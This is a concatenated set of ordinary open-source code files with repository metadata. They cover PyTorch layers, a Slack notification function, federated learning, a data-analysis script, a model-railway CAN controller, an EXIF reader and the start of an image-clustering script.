use_bn:\n\t\t\tself.bn = nn.BatchNorm2d(ci)\n\t\telse:\n\t\t\tself.bn = None\n\t\tself.act_fn = get_act_fn(act_fn, False)\n\t\tkwargs = setup_kwargs(defaults, kwargs)\n\t\tself.conv = Conv2D(**kwargs)\n\n\tdef forward(self, x):\n\t\tif self.bn is not None:\n\t\t\tx = self.bn(x)\n\t\tif self.act_fn is not None:\n\t\t\tx = self.act_fn(x)\n\t\tif self.upsample is not None:\n\t\t\tx = self.upsample(x)\n\t\tx = self.conv(x)\n\t\treturn x\n\n\nclass Conv1D(nn.Conv1d):\n\tdef __init__(\n\t\t\tself,\n\t\t\tin_channels: int,\n\t\t\tout_channels: int,\n\t\t\tkernel_size: int,\n\t\t\tnormalize_dim: int = 0,\n\t\t\treg_lognorm: bool = True,\n\t\t\tinit_scale: float = 1.0,\n\t\t\t**kwargs,\n\t):\n\t\tkwargs = filter_kwargs(nn.Conv1d, kwargs)\n\t\tself.pad = kernel_size - 1\n\t\tkwargs['padding'] = self.pad\n\t\tsuper(Conv1D, self).__init__(\n\t\t\tin_channels=in_channels,\n\t\t\tout_channels=out_channels,\n\t\t\tkernel_size=kernel_size,\n\t\t\t**kwargs,\n\t\t)\n\t\tassert init_scale > 0\n\t\tself.dims, self.shape = _dims(normalize_dim, 3)\n\t\tinit = torch.ones(self.out_channels).mul(init_scale)\n\t\tself.lognorm = nn.Parameter(\n\t\t\tdata=torch.log(init),\n\t\t\trequires_grad=reg_lognorm,\n\t\t)\n\t\tself._normalize_weight()\n\n\tdef forward(self, x):\n\t\tself._normalize_weight()\n\t\treturn F.conv1d(\n\t\t\tinput=x,\n\t\t\tweight=self.w,\n\t\t\tbias=self.bias,\n\t\t\tstride=self.stride,\n\t\t\tpadding=self.padding,\n\t\t\tdilation=self.dilation,\n\t\t\tgroups=self.groups,\n\t\t)[..., :-self.pad].contiguous()\n\n\tdef _normalize_weight(self):\n\t\tself.w = _normalize(\n\t\t\tlognorm=self.lognorm,\n\t\t\tweight=self.weight,\n\t\t\tshape=self.shape,\n\t\t\tdims=self.dims,\n\t\t)\n\n\nclass Conv2D(nn.Conv2d):\n\tdef __init__(\n\t\t\tself,\n\t\t\tin_channels: int,\n\t\t\tout_channels: int,\n\t\t\tkernel_size: int,\n\t\t\tnormalize_dim: int = 0,\n\t\t\treg_lognorm: bool = True,\n\t\t\tinit_scale: float = 1.0,\n\t\t\t**kwargs,\n\t):\n\t\tkwargs = filter_kwargs(nn.Conv2d, kwargs)\n\t\tsuper(Conv2D, self).__init__(\n\t\t\tin_channels=in_channels,\n\t\t\tout_channels=out_channels,\n\t\t\tkernel_size=kernel_size,\n\t\t\t**kwargs,\n\t\t)\n\t\tassert init_scale > 0\n\t\tself.dims, self.shape = _dims(normalize_dim, 4)\n\t\tinit = torch.ones(self.out_channels).mul(init_scale)\n\t\tself.lognorm = nn.Parameter(\n\t\t\tdata=torch.log(init),\n\t\t\trequires_grad=reg_lognorm,\n\t\t)\n\t\tself._normalize_weight()\n\n\tdef forward(self, x):\n\t\tself._normalize_weight()\n\t\treturn F.conv2d(\n\t\t\tinput=x,\n\t\t\tweight=self.w,\n\t\t\tbias=self.bias,\n\t\t\tstride=self.stride,\n\t\t\tpadding=self.padding,\n\t\t\tdilation=self.dilation,\n\t\t\tgroups=self.groups,\n\t\t)\n\n\tdef _normalize_weight(self):\n\t\tself.w = _normalize(\n\t\t\tlognorm=self.lognorm,\n\t\t\tweight=self.weight,\n\t\t\tshape=self.shape,\n\t\t\tdims=self.dims,\n\t\t)\n\n\nclass DeConv2D(nn.ConvTranspose2d):\n\tdef __init__(\n\t\t\tself,\n\t\t\tin_channels: int,\n\t\t\tout_channels: int,\n\t\t\tkernel_size: Union[int, Tuple[int, int]],\n\t\t\tnormalize_dim: int = 1,\n\t\t\treg_lognorm: bool = True,\n\t\t\tinit_scale: float = 1.0,\n\t\t\t**kwargs,\n\t):\n\t\tkwargs = filter_kwargs(nn.ConvTranspose2d, kwargs)\n\t\tsuper(DeConv2D, self).__init__(\n\t\t\tin_channels=in_channels,\n\t\t\tout_channels=out_channels,\n\t\t\tkernel_size=kernel_size,\n\t\t\t**kwargs,\n\t\t)\n\t\tassert init_scale > 0\n\t\tself.dims, self.shape = _dims(normalize_dim, 4)\n\t\tinit = torch.ones(self.out_channels).mul(init_scale)\n\t\tself.lognorm = 
nn.Parameter(\n\t\t\tdata=torch.log(init),\n\t\t\trequires_grad=reg_lognorm,\n\t\t)\n\t\tself._normalize_weight()\n\n\tdef forward(self, x, output_size=None):\n\t\tself._normalize_weight()\n\t\treturn F.conv_transpose2d(\n\t\t\tinput=x,\n\t\t\tweight=self.w,\n\t\t\tbias=self.bias,\n\t\t\tstride=self.stride,\n\t\t\tpadding=self.padding,\n\t\t\tdilation=self.dilation,\n\t\t\tgroups=self.groups,\n\t\t)\n\n\tdef _normalize_weight(self):\n\t\tself.w = _normalize(\n\t\t\tlognorm=self.lognorm,\n\t\t\tweight=self.weight,\n\t\t\tshape=self.shape,\n\t\t\tdims=self.dims,\n\t\t)\n\n\nclass Linear(nn.Linear):\n\tdef __init__(\n\t\t\tself,\n\t\t\tin_features: int,\n\t\t\tout_features: int,\n\t\t\tnormalize_dim: int = 0,\n\t\t\treg_lognorm: bool = True,\n\t\t\tinit_scale: float = 1.0,\n\t\t\t**kwargs,\n\t):\n\t\tkwargs = filter_kwargs(nn.Linear, kwargs)\n\t\tsuper(Linear, self).__init__(\n\t\t\tin_features=in_features,\n\t\t\tout_features=out_features,\n\t\t\t**kwargs,\n\t\t)\n\t\tassert init_scale > 0\n\t\tself.dims, self.shape = _dims(normalize_dim, 2)\n\t\tinit = torch.ones(self.out_features).mul(init_scale)\n\t\tself.lognorm = nn.Parameter(\n\t\t\tdata=torch.log(init),\n\t\t\trequires_grad=reg_lognorm,\n\t\t)\n\t\tself._normalize_weight()\n\n\tdef forward(self, x):\n\t\tself._normalize_weight()\n\t\treturn F.linear(\n\t\t\tinput=x,\n\t\t\tweight=self.w,\n\t\t\tbias=self.bias,\n\t\t)\n\n\tdef _normalize_weight(self):\n\t\tself.w = _normalize(\n\t\t\tlognorm=self.lognorm,\n\t\t\tweight=self.weight,\n\t\t\tshape=self.shape,\n\t\t\tdims=self.dims,\n\t\t)\n\n\nclass RotConv2d(nn.Conv2d):\n\tdef __init__(\n\t\t\tself,\n\t\t\tco: int,\n\t\t\tn_rots: int,\n\t\t\tkernel_size: Union[int, Iterable[int]],\n\t\t\tbias: bool = True,\n\t\t\tgain: bool = True,\n\t\t\t**kwargs,\n\t):\n\t\tsuper(RotConv2d, self).__init__(\n\t\t\tin_channels=2,\n\t\t\tout_channels=co,\n\t\t\tkernel_size=kernel_size,\n\t\t\tpadding='valid',\n\t\t\tbias=bias,\n\t\t\t**kwargs,\n\t\t)\n\t\tself.n_rots = n_rots\n\t\tself._build_rot_mat()\n\t\tif bias:\n\t\t\tbias = nn.Parameter(\n\t\t\t\ttorch.zeros(co*n_rots),\n\t\t\t\trequires_grad=True,\n\t\t\t)\n\t\telse:\n\t\t\tbias = None\n\t\tself.bias = bias\n\t\tif gain:\n\t\t\tgain = nn.Parameter(\n\t\t\t\ttorch.ones(co*n_rots),\n\t\t\t\trequires_grad=True,\n\t\t\t)\n\t\telse:\n\t\t\tgain = None\n\t\tself.gain = gain\n\t\tself.w = self.augment_weight()\n\n\tdef forward(self, x):\n\t\tself.w = self.augment_weight()\n\t\treturn F.conv2d(\n\t\t\tinput=x,\n\t\t\tweight=self.w,\n\t\t\tbias=self.bias,\n\t\t\tstride=self.stride,\n\t\t\tpadding=self.padding,\n\t\t\tdilation=self.dilation,\n\t\t\tgroups=self.groups,\n\t\t)\n\n\tdef _build_rot_mat(self):\n\t\tthetas = np.deg2rad(np.arange(\n\t\t\t0, 360, 360 / self.n_rots))\n\t\tu = [0.0, 0.0, 1.0]\n\t\tu = np.array(u).reshape(1, -1)\n\t\tu = np.repeat(u, self.n_rots, 0)\n\t\tu *= thetas.reshape(-1, 1)\n\t\tr = Rotation.from_rotvec(u)\n\t\tr = r.as_matrix()\n\t\tr = torch.tensor(\n\t\t\tdata=r[:, :2, :2],\n\t\t\tdtype=torch.float,\n\t\t)\n\t\tself.register_buffer('rot_mat', r)\n\t\treturn\n\n\tdef augment_weight(self, eps=1e-12):\n\t\twn = torch.linalg.vector_norm(\n\t\t\tx=self.weight,\n\t\t\tdim=[1, 2, 3],\n\t\t\tkeepdim=True,\n\t\t)\n\t\tw = torch.einsum(\n\t\t\t'rij, kjxy -> krixy',\n\t\t\tself.rot_mat,\n\t\t\tself.weight / (wn + eps),\n\t\t).flatten(end_dim=1)\n\t\tif self.gain is not None:\n\t\t\tw *= self.gain.view(-1, 1, 1, 1)\n\t\treturn w\n\n\nclass AddNorm(object):\n\tdef __init__(self, norm, types, **kwargs):\n\t\tsuper(AddNorm, 
self).__init__()\n\t\tself.norm = norm\n\t\tself.types = types\n\t\tif self.norm == 'spectral':\n\t\t\tself.kwargs = filter_kwargs(\n\t\t\t\tfn=nn.utils.parametrizations.spectral_norm,\n\t\t\t\tkw=kwargs,\n\t\t\t)\n\t\telif self.norm == 'weight':\n\t\t\tself.kwargs = filter_kwargs(\n\t\t\t\tfn=nn.utils.weight_norm,\n\t\t\t\tkw=kwargs,\n\t\t\t)\n\t\telse:\n\t\t\traise NotImplementedError\n\n\tdef get_fn(self) -> Callable:\n\t\tif self.norm == 'spectral':\n\t\t\tdef fn(m):\n\t\t\t\tif isinstance(m, self.types):\n\t\t\t\t\tnn.utils.parametrizations.spectral_norm(\n\t\t\t\t\t\tmodule=m, **self.kwargs)\n\t\t\t\treturn\n\t\telif self.norm == 'weight':\n\t\t\tdef fn(m):\n\t\t\t\tif isinstance(m, self.types):\n\t\t\t\t\tnn.utils.weight_norm(\n\t\t\t\t\t\tmodule=m, **self.kwargs)\n\t\t\t\treturn\n\t\telse:\n\t\t\traise NotImplementedError\n\t\treturn fn\n\n\ndef _normalize(lognorm, weight, shape, dims, eps=1e-8):\n\tn = torch.exp(lognorm).view(shape)\n\twn = torch.linalg.vector_norm(\n\t\tx=weight, dim=dims, keepdim=True)\n\treturn n * weight / (wn + eps)\n\n\ndef _dims(normalize_dim, ndims):\n\tassert normalize_dim in [0, 1]\n\tdims = list(range(ndims))\n\tshape = [\n\t\t1 if i != normalize_dim\n\t\telse -1 for i in dims\n\t]\n\tdims.pop(normalize_dim)\n\treturn dims, shape\n","repo_name":"hadivafaii/_MTMST","sub_path":"base/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":11805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70660771629","text":"import json\nimport requests\n\ndef read_secret(secret):\n f = open('/var/openfaas/secrets/' + secret)\n val = f.read()\n if val is None:\n raise Exception(\"Requires {0} secret in function namespace\".format(secret))\n f.close()\n return val\n\ndef handle(req):\n webhook_url = read_secret(\"slack_webhook\")\n message = req\n\n slack_data = {'text': message}\n \n response = requests.post(\n webhook_url, data=json.dumps(slack_data),\n headers={'Content-Type': 'application/json'}\n )\n return {\"status\": response.status_code}\n","repo_name":"davlloyd/openfaas-gitops","sub_path":"functions/slack-notify/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"72754889066","text":"from CVSOperator import CSVOperator\r\nimport numpy as np\r\nimport random as rd\r\nimport torch\r\nimport time\r\nimport torch.nn as nn\r\nfrom Net.neural_net_work import NeuralNetWork\r\nfrom torch.utils.data import DataLoader\r\n\r\ndef CrossEntropy_derivative(pred, label):\r\n if pred == 0:\r\n pred = 0.00001\r\n pred = (1/pred)*label - (1-label)/(1-pred)\r\n return -pred\r\n\r\nclass Client:\r\n def __init__(self, data_set, ID, model_path):\r\n self.client_id = ID\r\n self.path = data_set\r\n self.model_path = model_path\r\n self.csv_operator = CSVOperator(data_set, 'r')\r\n self.data_set, self.test_data_set = self.load_data()\r\n self.model = NeuralNetWork(input_dimension=len(self.data_set[0]), output_dimension=2)\r\n\r\n\r\n \r\n def train_local_model(self):\r\n self.model.learning_process(self.data_set)\r\n\r\n def save_model(self):\r\n self.model.save_model(self.client_id)\r\n \r\n def training_process(self): # training loop\r\n echo = 10\r\n loss_sum = 0\r\n loss_fn = nn.BCELoss() \r\n optimizer = torch.optim.SGD(self.model.parameters(), lr=0.01)\r\n flag = False # flag marking whether training has completed\r\n for e in range(echo):\r\n data = DataLoader(self.data_set, batch_size=30)\r\n for data_batch, label_batch in data:\r\n sample_ = torch.tensor(data_batch, dtype=torch.float32)\r\n label_ = torch.tensor(label_batch, dtype=torch.float32).unsqueeze(-1)\r\n pred = self.model(sample_)\r\n loss = loss_fn(pred, label_)\r\n loss_sum += loss.item()\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n flag = True\r\n return flag\r\n\r\n\r\n\r\n def test(self, e): # evaluate the model\r\n row = []\r\n title = ["+", "-", "groundtruth"]\r\n time_cost_start = time.time()\r\n row.append(title)\r\n c = 0\r\n length = len(self.test_data_set[0]) # the label comes first in my data layout; adjust to your own needs\r\n for i in range(len(self.test_data_set)):\r\n sample_ = torch.tensor(self.test_data_set[i][1:length+1], dtype=torch.float32)\r\n res = self.model(sample_)\r\n res = res.detach().numpy()[0]\r\n row.append([res, 1-res, self.test_data_set[i][0]])\r\n c += 1\r\n time_cost_end = time.time()\r\n self.time_cost = time_cost_end-time_cost_start\r\n csv_writer = CSVOperator(\"result/\"+ str(e)+self.model_path, 'w')\r\n csv_writer.write_row(row)\r\n \r\n \r\n\r\n def load_data(self):\r\n data_set_train = []\r\n data_set_test = []\r\n data_set_all = []\r\n c = 0\r\n for row in self.csv_operator.reader:\r\n if c == 0:\r\n c += 1\r\n continue\r\n data_set_all.append(row)\r\n rd.seed(self.client_id) # seed with the client id so the random split is identical on every run (needed for reproducible paper experiments and easier analysis)\r\n rd.shuffle(data_set_all)\r\n for row in data_set_all:\r\n if c < np.floor(len(data_set_all)*0.7):\r\n data_set_train.append(np.array(row))\r\n else:\r\n data_set_test.append(np.array(row))\r\n c += 1\r\n \r\n return data_set_train, data_set_test\r\n\r\n\r\ndef data_format_conversion(data_row): # convert array to tensor\r\n data_row = np.array(data_row)\r\n data_input = torch.tensor(data_row, dtype=torch.float32)\r\n return data_input","repo_name":"big-Cat-123/FLFramework","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21204162701","text":"import numpy as np\n\ndef sample_without_replacement(policy):\n rankings = np.zeros(policy.shape, dtype=int)\n for batch_id in range(policy.shape[0]):\n\n # Sample according to the policy for each batch, add some small value to prevent 0 entries\n # from crashing the sampler.\n rankings[batch_id][:] = np.random.choice(policy.shape[1], size=policy.shape[1], replace=False, \\\n p=(policy[batch_id] + 1e-12))\n\n return rankings\n","repo_name":"Roxot/pgrank","sub_path":"explorers/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20605527316","text":"from typing import Optional, Sequence\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass MLP(nn.Module):\n def __init__(self, dims: Sequence[int], sigmoid_pos: Optional[int] = None) -> None:\n super(MLP, self).__init__()\n layers = nn.ModuleList()\n if sigmoid_pos == -1:\n sigmoid_pos = len(dims) - 2\n\n for i, dim in enumerate(dims[:-1]):\n layers.append(nn.Linear(dim, dims[i + 1], bias=True))\n if i == sigmoid_pos:\n layers.append(nn.Sigmoid())\n else:\n layers.append(nn.ReLU())\n\n self.layers = nn.Sequential(*layers)\n self._init_weights()\n\n def _init_weights(self) -> None:\n for mod in self.modules():\n if isinstance(mod, nn.Linear):\n nn.init.normal_(\n mod.weight.data, 0.0, np.sqrt(2.0 / (mod.in_features + mod.out_features))\n )\n nn.init.normal_(mod.bias.data, 0.0, np.sqrt(1.0 / mod.out_features))\n\n 
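# A minimal usage sketch for this MLP (hypothetical dims, not from the original repo):\n    #   model = MLP([8, 16, 1], sigmoid_pos=-1)  # ReLU after the hidden layer, Sigmoid on the output\n    #   out = model(torch.randn(4, 8))           # -> tensor of shape (4, 1), values in (0, 1)\n    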
def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n output: torch.Tensor = self.layers(inputs)\n return output\n","repo_name":"KanchiShimono/torch-fm","sub_path":"src/torch_fm/nn/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1031973658","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\ndef readDataset(path):\r\n data = pd.read_csv(path, encoding=\"Windows-1252\", delimiter=';')\r\n return data\r\n\r\n\r\ndef fixIssues(data):\r\n data.rename(columns={\"Populatiion\": \"Population\"}, inplace=True)\r\n\r\n print(data.Region.unique())\r\n\r\n for i in range(data.shape[0]):\r\n if not data['GDP per capita'].isnull()[i]:\r\n data.loc[i, 'GDP per capita'] = abs(float(data.loc[i, 'GDP per capita'].replace(',', '.')))\r\n if not data['Population'].isnull()[i]:\r\n data.loc[i, 'Population'] = abs(int(data.loc[i, 'Population']))\r\n if not data['CO2 emission'].isnull()[i]:\r\n data.loc[i, 'CO2 emission'] = abs(float(data.loc[i, 'CO2 emission'].replace(',', '.')))\r\n if not data['Area'].isnull()[i]:\r\n data.loc[i, 'Area'] = abs(float(data.loc[i, 'Area'].replace(',', '.')))\r\n\r\n\r\ndef replaceBlank(data):\r\n gdp, popul, co2, area = map(float, data.mean())\r\n popul = int(popul)\r\n for i in range(data.shape[0]):\r\n if data['GDP per capita'].isnull()[i]:\r\n data.loc[i, 'GDP per capita'] = gdp\r\n if data['Population'].isnull()[i]:\r\n data.loc[i, 'Population'] = popul\r\n if data['CO2 emission'].isnull()[i]:\r\n data.loc[i, 'CO2 emission'] = co2\r\n if data['Area'].isnull()[i]:\r\n data.loc[i, 'Area'] = area\r\n return data\r\n\r\n\r\ndef boxPlot(data, value):\r\n plt.figure()\r\n plt.title('Box plot for ' + value)\r\n plt.boxplot(data[value])\r\n\r\n\r\ndef histogram(data, value):\r\n plt.figure()\r\n plt.title('Histogram for ' + value)\r\n plt.hist(x=data[value])\r\n\r\n\r\ndef addColumn(data):\r\n data['Density'] = data['Population'] / data['Area']\r\n return data\r\n\r\n\r\ndef maxAverageArea(data):\r\n regions = data.Region.unique()\r\n maxVal, maxReg = 0, 0\r\n for i in regions:\r\n d = data[data.Region == i]\r\n if d.Area.mean() > maxVal:\r\n maxVal = d.Area.mean()\r\n maxReg = i\r\n return maxVal, maxReg\r\n\r\n\r\ndef maxDensity(data, region=\"world\"):\r\n if region == \"world\":\r\n maxVal = data['Density'].max()\r\n else:\r\n maxVal = data[data.Region == region]['Density'].max()\r\n\r\n return maxVal, data[data['Density'] == maxVal][\"Country Name\"].iat[0]\r\n\r\n\r\ndef GDPbyRegions(data):\r\n regions = data.Region.unique()\r\n for i in regions:\r\n valMean = data[data.Region == i]['GDP per capita'].mean()\r\n valMedian = data[data.Region == i]['GDP per capita'].median()\r\n if abs(valMedian - valMean) <= min(valMedian, valMean) * 0.05:\r\n print(i, \"'s average and median are equal with the values of\", valMean, \"and\", valMedian)\r\n\r\n\r\nif __name__ == '__main__':\r\n data = readDataset(\"Data2.csv\")\r\n print(data.head())\r\n\r\n fixIssues(data)\r\n print(data)\r\n\r\n data = replaceBlank(data)\r\n print(data.head())\r\n\r\n print(data.info())\r\n\r\n boxPlot(data, 'GDP per capita')\r\n boxPlot(data, 'Population')\r\n boxPlot(data, 'CO2 emission')\r\n boxPlot(data, 'Area')\r\n\r\n histogram(data, 'GDP per capita')\r\n histogram(data, 'Population')\r\n histogram(data, 'CO2 emission')\r\n histogram(data, 'Area')\r\n plt.show()\r\n\r\n data = addColumn(data)\r\n print(data.head())\r\n\r\n print(\"The 
highest GDP per capita is in\",\r\n data[data['GDP per capita'] == data['GDP per capita'].max()][\"Country Name\"].iat[0],\r\n \"with the value of\", data['GDP per capita'].max())\r\n print(\"\\nThe country with the smallest area is\", data[data['Area'] == data['Area'].min()][\"Country Name\"].iat[0],\r\n \"with the value of\", data['Area'].min())\r\n\r\n maxVal, maxArea = maxAverageArea(data)\r\n print(\"\\nMaximum average area is\", maxVal, \"in\", maxArea)\r\n\r\n maxVal, maxArea = maxDensity(data)\r\n print(\"\\nMax density in the world is in\", maxArea, \"with the value of\", maxVal)\r\n maxVal, maxArea = maxDensity(data, \"Europe & Central Asia\")\r\n print(\"\\nMax density in Europe and Central Asia is in\", maxArea, \"with the value of\", maxVal)\r\n\r\n GDPbyRegions(data)\r\n\r\n dataByGDP = data.sort_values(\"GDP per capita\", ascending=False)\r\n print(\"\\n\", dataByGDP.head()[['Country Name', \"GDP per capita\"]], \"\\n\",\r\n dataByGDP.tail()[['Country Name', \"GDP per capita\"]])\r\n\r\n dataByCo2 = data[::]\r\n dataByCo2[\"CO2 per capita\"] = dataByCo2[\"CO2 emission\"] / dataByCo2[\"Population\"]\r\n dataByCo2 = dataByCo2.sort_values(\"CO2 per capita\", ascending=False)\r\n print(\"\\n\", dataByCo2.head()[['Country Name', \"CO2 per capita\"]], \"\\n\",\r\n dataByCo2.tail()[['Country Name', \"CO2 per capita\"]])\r\n\r\n dataByCo2.to_csv(\"dataByCo2.csv\")\r\n","repo_name":"expresoviter/KPI_Study","sub_path":"Semester_4/Data analysis in information systems/Lab3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19952543359","text":"from CV_Robot import robot\nfrom CV_Robot import vision\n\nvision.activate_camera()\nrobot.forward()\nwhile True:\n img = vision.get_camera_image()\n vision.show_objects(img)\n if vision.Objects.PERSON not in vision.find_objects(img):\n break\nrobot.stop()\n\n\nimport os\nfor item in os.listdir('Examples/Samples/100samples'):\n print(item)\n img = vision.load_image(\"Examples/Samples/100samples/\" + item)\n print(vision.find_objects(img))\n vision.show_objects(img)\n\nimg = vision.load_image(\"Examples/Samples/busy_street.jpg\")\nprint(vision.find_objects(img))\nvision.show_objects(img, pause=True)\n#\n# vision.activate_camera()\nvision.load_video(\"Examples/Samples/pedestrians.mp4\")\nwhile True:\n img = vision.get_camera_image()\n if img is None:\n break\n print(vision.find_objects(img))\n vision.show_objects(img)\n\n\n","repo_name":"RobertJN64/CV_Robot","sub_path":"Examples/cv_robot_test.py","file_name":"cv_robot_test.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10812902517","text":"import serial\nimport time\nimport timeit\nimport threading\nimport io\nimport __builtin__\n\n__builtin__.adres = 0\n__builtin__.c = threading.Condition()\n\n# device types\nTYP_NONE = 0x00\nTYP_Zwrotnica = 0x01\nTYP_Semafor = 0x02\nTYP_Balisa = 0x03\n\n# zones\nSTR_NONE = 0x00\nSTR_Strzyza = 0x01\nSTR_Kielpinek = 0x02\nSTR_Rebiechowo = 0x03\nSTR_Banino = 0x04\nSTR_Wrzeszcz = 0x05\n\n# semaphores\nLED_GREEN = 0x31\nLED_YELLOW1 = 0x32\nLED_RED = 0x33\nLED_YELLOW2 = 0x34\nLED_WHITE = 0x35\nLED_OFF = 0x30\nLED_GET = 0x39\n\n# frame:\n# 1: '>'\n# 4: addr hex in ascii\n# 1: space\n# 1: command\n# n: parameters\n# 1: '\\r'\n\nsemafor = []\nzwrotnica = []\nbalisa = []\n\n\nclass Agent:\n def __init__(self, addr='1F000000', strefa='', l_addr=None):\n self.address = addr\n self.strefa = strefa\n self.l_address = l_addr\n\n def send(self, data):\n msg = '>' + self.address + ' ' + data + '\\r'\n ser.write(msg.decode('unicode-escape'))\n\n @staticmethod\n def skanuj():\n ser.write(u'>1F000000 39\\r')\n\n def zmien_adres(self, strefa, adres):\n ser.write('61 ' + strefa + adres)\n self.address = strefa << 16 + adres\n\n\nclass Semafor:\n def __init__(self, addr, strefa, l_addr):\n self.agent = Agent(addr, strefa, l_addr)\n\n def wlacz(self, led):\n self.agent.send(led + ' 00')\n\n def mrugaj(self, led):\n self.agent.send('00 ' + led)\n\n def wylacz(self):\n self.agent.send('0x30 ' + '0x30')\n\n\nclass Zwrotnica:\n def __init__(self, addr, strefa, l_addr, stat, limit):\n self.agent = Agent(addr, strefa, l_addr)\n self.state = stat\n self.limiter = limit\n\n def lewo(self):\n self.agent.send('31')\n\n def prawo(self):\n self.agent.send('32')\n\n def wylacz(self):\n self.agent.send('30')\n\n\nclass Balisa:\n def __init__(self, addr, strefa, l_addr, stat, hist):\n self.agent = Agent(addr, strefa, l_addr)\n self.state = stat\n self.histereza = hist\n\n def wlacz(self, hist):\n self.histereza = hist\n self.agent.send('33 ' + str(self.histereza))\n\n def wylacz(self):\n self.agent.send('30')\n\n### END OF CLASSES ###\ndef _readline():\n ms = []\n while True:\n c = ser.read(1)\n if c == '\\r':\n return ms\n else:\n ms.append(c)\n\n\ndef can_odb():\n while ser_raw.isOpen():\n reading = ser.readline()\n # print('received: ' + reading)\n handle_data(reading)\n print('can_odb finished')\n\n\ndef sprawdz(items, key): # do we already have this address in the table\n for item in items:\n if item.agent.address == key:\n return item\n return None\n\n\ntime1 = 0\nlast_time1 = 0\n\ndef handle_scan(data):\n global time1\n global last_time1\n\n address = data[1:9]\n typ = data[1:3]\n strefa = data[3:5]\n l_adres = data[5:9]\n attr1 = data[10:12]\n attr2 = data[13:15]\n attr3 = data[16:18]\n attr4 = data[19:21]\n\n if typ == '01':\n zwr = sprawdz(zwrotnica, address)\n if zwr:\n zwr.stat = attr1\n zwr.limiter = attr2\n else:\n zwrotnica.append(Zwrotnica(address, strefa, l_adres, attr1, attr3))\n\n elif typ == '02': # Semafor\n sem = sprawdz(semafor, address)\n if not sem:\n semafor.append(Semafor(address, strefa, l_adres))\n\n elif typ == '03': # Balisa\n bal = sprawdz(balisa, address)\n if bal:\n bal.state = attr1\n bal.histereza = attr2\n #if attr3 < '70': # larger = rear, smaller = front, for trains 1 and 2\n __builtin__.c.acquire()\n __builtin__.adres = address\n __builtin__.c.release()\n # last_time1 = time1\n # time1 = time.clock() # current time\n # print u'balisa ' + l_adres + u'\\t' + str(time1 - last_time1)\n else:\n balisa.append(Balisa(address, strefa, l_adres, attr1, attr2))\n\n # doGUI(address)\n # for x in balisa:\n # if x.l_addr == l_adres:\n # print 'balisa ' + l_adres + '\\t' #+ end - start\n # return None\n # last_time = time\n # time = timeit.timeit()\n # print time-last_time\n # if typ == '03' and attr3 < '70': # larger = rear, smaller = front\n # print data[16:18]\n # print u'time1 ' + str(time1)\n # print u'last_time ' + str(last_time1)\n # print (time1 - last_time1)\n\n\ndef handle_data(data):\n dat = data.split('\\r')\n for d in dat:\n handle_scan(d)\n\n # f = open('pkm_scan.txt', 'r')\n # data = f.read()\n # print data\n\n\nser_raw = serial.Serial(\n port='COM6',\n # port='COM21',\n baudrate=500000,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS\n)\n\nif ser_raw.isOpen():\n print('Serial is open: ')\nelse:\n print('Serial is closed!!')\nprint(ser_raw.portstr)\n\nser = io.TextIOWrapper(io.BufferedRWPair(ser_raw, ser_raw, 1),\n newline='\\r',\n line_buffering=True)\nser._CHUNK_SIZE = 1\n\n# receive thread\nwatek_odb = threading.Thread(target=can_odb)\nwatek_odb.start()\n\nser.write(u'master\\r')\nAgent.skanuj()\n\ntime.sleep(5)\nfor balisas in balisa: # set up automatic reporting and hysteresis\n balisas.wlacz(0x70)\n time.sleep(0.5) # without the sleep it gets clogged up\n","repo_name":"vurumutu/PKM","sub_path":"CAN.py","file_name":"CAN.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23631403405","text":"import exifread\n\ndef get_selected_exif(exif):\n selected_data = {\n 'EXIF DateTimeOriginal': '',\n 'EXIF FNumber': '',\n 'EXIF FocalLength': '',\n 'EXIF SubSecTimeOriginal': '',\n 'EXIF ExposureTime': '',\n 'EXIF ISOSpeedRatings': ''\n }\n\n for tag in exif.keys():\n if tag not in ('JPEGThumbnail', 'TIFFThumbnail', 'Filename', 'EXIF MakerNote'):\n if tag in selected_data:\n selected_data[tag] = '%s' % (exif[tag])\n return selected_data\n\ndef get_exif(filename):\n # Open image file for reading (must be in binary mode)\n f = open(filename, 'rb')\n tags = exifread.process_file(f)\n return tags","repo_name":"tomasz-rebas/python-exif-file-renamer","sub_path":"exif_reader.py","file_name":"exif_reader.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25226826264","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport seaborn as sns\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_score\nfrom sklearn.preprocessing import StandardScaler\nfrom kneed import KneeLocator\nimport shutil\nfrom PIL import Image\n\n\"\"\"\nThis script groups the images of the FAICC database according to their ratings of:\n- Valence\n- Arousal\nThese ratings will decide which images will be presented together for the 60second interval.\nThe FAICC database is a database comprising 301 images related to climate change.\nThe images were given ratings of valence, arousal and relevance by 106 participants.\nFor these ratings a 9-point Likert scale was used.\nArousal: 1 ==> calming feeling, 9 ==> exciting 